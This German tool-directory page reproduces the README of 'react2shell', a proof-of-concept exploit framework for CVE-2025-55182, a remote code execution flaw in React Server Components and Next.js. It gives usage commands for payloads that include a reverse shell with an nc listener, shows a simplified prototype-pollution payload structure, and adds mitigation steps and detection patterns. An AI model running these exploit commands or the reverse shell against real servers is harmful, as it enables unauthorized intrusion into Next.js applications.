Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react2shell — Ein vollständiges Framework zur Ausnutzung der Schwachstelle CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/zr0n/react2shell
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubzr0n/react2shell

react2shell

Ein vollständiges Framework zur Ausnutzung der Schwachstelle CVE-2025-55182

Repository anzeigen
1053vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

React2Shell - CVE-2025-55182 Exploit PoC

Security Platform License

Ein Proof-of-Concept-Exploit für CVE-2025-55182, eine kritische Remote-Code-Ausführung-Schwachstelle in Next.js-Anwendungen, die React Server Components verwenden.

⚠️ HAFTUNGSAUSSCHLUSS

DIESES TOOL IST AUSSCHLIESSLICH FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS GEDACHT.

  • ❌ NICHT gegen Systeme verwenden, die dir nicht gehören oder für die du keine explizite Erlaubnis zum Testen hast.
  • ❌ Unbefugter Zugriff auf Computersysteme ist illegal.
  • ✅ Nur in kontrollierten Umgebungen für Lernzwecke und autorisierte Penetrationstests verwenden.
  • ✅ Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

📋 Schwachstellendetails

  • CVE ID: CVE-2025-55182
  • Vulnerability: Remote Code Execution in React Server Components
  • Betroffene Versionen:
    • Next.js: ≥14.3.0-canary.77, all 15.x and 16.x versions with App Router
    • React: 19.0, 19.1.0, 19.1.1, 19.2.0
  • Behobene Versionen:
    • Next.js: 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5
    • React: 19.0.1, 19.1.2, 19.2.1
  • CVSS-Score: Kritisch
  • Angriffsvektor: Netzwerkbasiert, erfordert präparierte POST-Anfrage
  • 🎯 Funktionen

    • ✅ Plattformübergreifende Unterstützung (Windows & Linux)
    • ✅ Mehrere Payload-Typen
    • ✅ Reverse-Shell-Funktionalität
    • ✅ Visuelle Proof-of-Concept-Payloads (calc, notepad)
    • ✅ Dateisystemoperationen
    • ✅ Systeminformationssammlung

    🔧 Installation

    root@kitploit:~
    # Clone or download this repository
    git clone https://github.com/zr0n/react2shell
    cd react2shell
    
    # Install dependencies
    npm install form-data
    

    💻 Verwendung

    Grundlegende Syntax

    root@kitploit:~
    node react2shell.js <target_url> <payload_type> [options]
    

    Verfügbare Payloads

    PayloadBeschreibungBeispiel
    basicMathematischer Proof-of-Concept (7*7+1=50)node react2shell.js http://target:3000 basic
    whoamiAktuellen Systembenutzer anzeigennode react2shell.js http://target:3000 whoami
    dirInhalte des aktuellen Verzeichnisses auflistennode react2shell.js http://target:3000 dir
    systeminfoBetriebssysteminformationen anzeigennode react2shell.js http://target:3000 systeminfo
    fileErstelle EXPLOITED.txt-Proof-Dateinode react2shell.js http://target:3000 file
    calcRechner starten (visueller Proof unter Windows)node react2shell.js http://target:3000 calc
    notepadNotepad starten (visueller Proof unter Windows)node react2shell.js http://target:3000 notepad
    shellReverse Shell (Windows/Linux automatische Erkennung)node react2shell.js http://target:3000 shell 10.10.10.5 4444

    Beispiele

    1. Einfacher Proof-of-Concept

    root@kitploit:~
    node react2shell.js http://localhost:3000 basic
    # Serverkonsole auf Ausgabe überprüfen: EXPLOITED: 50
    

    2. Systemerkundung

    root@kitploit:~
    # Aktuellen Benutzer abrufen
    node react2shell.js http://localhost:3000 whoami
    
    # Dateien auflisten
    node react2shell.js http://localhost:3000 dir
    
    # Systeminformationen
    node react2shell.js http://localhost:3000 systeminfo
    

    3. Visueller Proof (Windows)

    root@kitploit:~
    # Rechner starten
    node react2shell.js http://localhost:3000 calc
    
    # Notepad starten
    node react2shell.js http://localhost:3000 notepad
    

    4. Dateierstellungs-Proof

    root@kitploit:~
    node react2shell.js http://localhost:3000 file
    # Serververzeichnis nach EXPLOITED.txt durchsuchen
    

    5. Reverse Shell

    root@kitploit:~
    # Terminal 1: Listener starten
    nc -lvnp 4444
    
    # Terminal 2: Exploit ausführen
    node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444
    
    # Funktioniert sowohl unter Windows (PowerShell) als auch Linux (Bash)
    

    🏗️ Einrichten einer verwundbaren Umgebung

    Voraussetzungen

    • Node.js 18+
    • npm or yarn

    Verwundbare Next.js-Anwendung erstellen

    root@kitploit:~
    # Projektverzeichnis erstellen
    mkdir vulnerable-nextjs-app
    cd vulnerable-nextjs-app
    
    # Next.js mit verwundbarer Version initialisieren
    npx create-next-app@latest . --ts --app --no-eslint --tailwind
    
    # Auf verwundbare Version downgraden
    npm install [email protected]
    
    # Abhängigkeiten installieren
    npm install
    

    Minimale verwundbare App (app/page.tsx)

    root@kitploit:~
    export default function Home() {
      return (
        <div className="p-8">
          <h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
          <p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
        </div>
      );
    }
    

    Server starten

    root@kitploit:~
    npm run dev
    # Server läuft auf http://localhost:3000
    

    🔍 Funktionsweise

    Der Exploit nutzt eine Deserialisierungsschwachstelle in React Server Components aus:

    1. Payload-Konstruktion: Erstellt ein bösartig serialisiertes Objekt mit Prototypverschmutzung
    2. Zugriff auf den Function-Konstruktor: Nutzt constructor.constructor, um auf den Function-Konstruktor zuzugreifen
    3. Code-Einschleusung: Injiziert beliebigen JavaScript-Code über das _prefix-Feld
    4. Ausführung: Server deserialisiert den Payload und führt den injizierten Code aus

    Technische Details

    root@kitploit:~
    // Vereinfachte Schwachstellenkette
    {
      _formData: {
        get: '$3:constructor:constructor' // Access Function constructor
      },
      _prefix: 'YOUR_CODE_HERE//' // Injected code
    }
    

    🛡️ Abhilfe/Maßnahmen

    Für Anwendungsbesitzer

    1. Sofort aktualisieren:

      root@kitploit:~
      npm update next@latest
      npm update react@latest react-dom@latest
      
    2. Behobene Versionen überprüfen:

      root@kitploit:~
      npm list next react
      
    3. Erforderliche Versionen:

      • Next.js: ≥16.0.7 oder ≥15.5.7
      • React: ≥19.2.1 oder ≥19.1.2

    Für Sicherheitsteams

    • Nach verwundbaren Next.js-Versionen in Ihrer Infrastruktur suchen
    • Web Application Firewall (WAF)-Regeln implementieren, um bösartige RSC-Payloads zu erkennen
    • Auf verdächtige POST-Anfragen mit next-action-Headern überwachen
    • Server-seitige Protokolle auf unerwartete Codeausführungsmuster überprüfen

    📊 Erkennung

    WAF-Regeln

    Achten Sie auf POST-Anfragen mit:

    • Header: next-action
    • Content-Type: multipart/form-data
    • Body containing: constructor, _prefix, _formData

    Protokollmuster

    root@kitploit:~
    POST / with next-action header
    Suspicious FormData keys: 0, 1, 2, 3, 4
    Response: 200 (successful exploitation) or 500 (failed)
    

    📚 Referenzen

    • CVE-2025-55182 - NVD
    • Next.js Security Advisories
    • React Security Updates
    • OWASP Code Injection

    🤝 Mitwirken

    Dies ist ein pädagogisches Tool. Beiträge, die Folgendes verbessern:

    • Erkennungsfähigkeiten
    • Dokumentation
    • Verteidigungsstrategien
    • Bildungsinhalte

    sind willkommen. Reichen Sie KEINE Beiträge ein, die Angriffsfähigkeiten verbessern.

    📜 Lizenz

    Nur für Bildungszwecke - Keine Garantie

    👤 Autor

    Luiz Fernando Ziron Erstellt für Cybersicherheitsbildung und Sensibilisierungszwecke.

    ⚖️ Rechtlicher Hinweis

    Durch die Nutzung dieses Tools stimmst du Folgendem zu:

    • Es nur auf Systemen zu verwenden, die dir gehören oder für die du eine ausdrückliche schriftliche Erlaubnis zum Testen hast
    • Die volle Verantwortung für deine Handlungen zu übernehmen
    • Den Autor nicht für Missbrauch oder Schäden haftbar zu machen
    • Alle geltenden Gesetze und Vorschriften einzuhalten

    Unbefugter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen eine Straftat.


    Bleib sicher, bleib ethisch, bleib legal. 🔒

    Tool herunterladen